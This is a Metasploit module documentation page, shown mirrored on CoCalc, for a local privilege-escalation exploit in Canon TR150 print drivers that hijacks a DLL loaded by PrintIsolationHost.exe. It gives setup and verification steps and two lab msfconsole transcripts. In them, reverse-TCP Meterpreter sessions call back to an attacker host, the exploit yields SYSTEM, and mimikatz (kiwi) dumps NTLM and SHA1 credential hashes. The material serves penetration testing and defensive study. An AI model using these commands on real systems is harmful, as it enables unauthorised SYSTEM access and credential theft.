CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/canon_driver_privesc.md
Views: 11788

Vulnerable Application

Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files within the CanonBJ directory and its subdirectories. By overwriting the DLL at C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll with a malicious DLL at the right time whilst running the C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program, which runs as NT AUTHORITY\SYSTEM, to successfully load the malicious DLL. Successful exploitation will grant attackers code execution as the NT AUTHORITY\SYSTEM user.

This module leverages the prnmngr.vbs script to add and delete printers. Multiple runs of this module may be required given successful exploitation is time-sensitive.

Installation Instructions

  1. Download the driver installer from https://pdisp01.c-wss.com/gdl/WWUFORedirectTarget.do?id=MDEwMDAxMDY5OTAx&cmp=ABR&lang=EN

  2. Open up the EXE and run it as an administrator. Wait for installation to finish.

  3. Go to Add a New Printer or Scanner, then select The printer that I want isn't listed. You may need to hit the refresh button for this to show up.

  4. Select Add a printer using a TCP/IP address or hostname and click Next

  5. Under Device Type select TCP/IP device, and enter a random nonexisting IP address.

  6. Uncheck Query the printer and automatically select the driver to use and click Next.

  7. Wait for a bit then once prompted for more port info select Standard under Device Type and select Canon Network Printer for device type.

  8. On the next screen select Canon TR150 Series and select Next.

  9. Select Use the driver that is currently installed (recommended) and select the Next button.

  10. Select Next and accept the default driver name, and the driver should install.

Verification Steps

  1. Install a vulnerable Canon TR150 driver using the steps from Installation Instructions

  2. Start msfconsole

  3. Get a session with basic privileges

  4. Do: use exploit/windows/local/canon_driver_privesc

  5. Do: set SESSION <sess_no>

  6. Do: run

  7. You should get a shell running as SYSTEM.

Options

Scenarios

Canon TR150 series v3.71.2.10 on Windows 10 Build 17134

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(multi/handler) > set lport 1270
lport => 1270
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.0.0.8:1270
[*] Sending stage (200262 bytes) to 10.0.0.7
[*] Meterpreter session 1 opened (10.0.0.8:1270 -> 10.0.0.7:49816) at 2021-08-05 11:14:25 -0400

meterpreter > getuid
Server username: MOURNLAND\lowlevel
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/canon_driver_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(windows/local/canon_driver_privesc) > set session 1
session => 1
msf6 exploit(windows/local/canon_driver_privesc) > run

[*] Started reverse TCP handler on 10.0.0.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat
[*] Adding printer ePzTcgz...
[*] Sending stage (200262 bytes) to 10.0.0.7
[+] Deleted C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat
[+] Deleted C:\Users\lowlevel\AppData\Local\Temp\CNMurGE.dll
[*] Meterpreter session 2 opened (10.0.0.8:4444 -> 10.0.0.7:49819) at 2021-08-05 11:15:31 -0400
[*] Deleting printer ePzTcgz

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > quit
[*] Shutting down Meterpreter...

TR150 series Printer Driver Ver.1.00 On Windows 10 20H2

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp
PAYLOAD => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 192.168.224.211
RHOST => 192.168.224.211
msf6 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 192.168.224.211:4444
[*] Sending stage (200262 bytes) to 192.168.224.211
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.224.211:4444) at 2021-08-09 14:11:47 -0500

meterpreter > getuid
Server username: DESKTOP-DIK4B96\test
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/canon_driver_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/canon_driver_privesc) > show options

Module options (exploit/windows/local/canon_driver_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/canon_driver_privesc) > set LPORT 8877
LPORT => 8877
msf6 exploit(windows/local/canon_driver_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > show options

Module options (exploit/windows/local/canon_driver_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT     8877             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/canon_driver_privesc) > exploit

[*] Started reverse TCP handler on 192.168.224.128:8877
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\test\AppData\Local\Temp\ssSffWM.bat
[*] Writing DLL file to C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Adding printer SFywU...
[*] Deleting printer SFywU
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/canon_driver_privesc) > exploit

[*] Started reverse TCP handler on 192.168.224.128:8877
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\test\AppData\Local\Temp\dsrlKmQ.bat
[*] Writing DLL file to C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Adding printer HRudL...
[*] Sending stage (200262 bytes) to 192.168.224.211
[+] Deleted C:\Users\test\AppData\Local\Temp\dsrlKmQ.bat
[+] Deleted C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Meterpreter session 2 opened (192.168.224.128:8877 -> 192.168.224.211:61310) at 2021-08-09 14:13:12 -0500
[*] Deleting printer HRudL

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-DIK4B96
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeTcbPrivilege

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain           NTLM                              SHA1
--------  ------           ----                              ----
test      DESKTOP-DIK4B96  0cb6948805f797bf2a82807973b89537  87f8ed9157125ffc4da9e06a7b8011ad80a53fe1

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-DIK4B96$  WORKGROUP        (null)
test              DESKTOP-DIK4B96  (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
desktop-dik4b96$  WORKGROUP        (null)
test              DESKTOP-DIK4B96  (null)


meterpreter >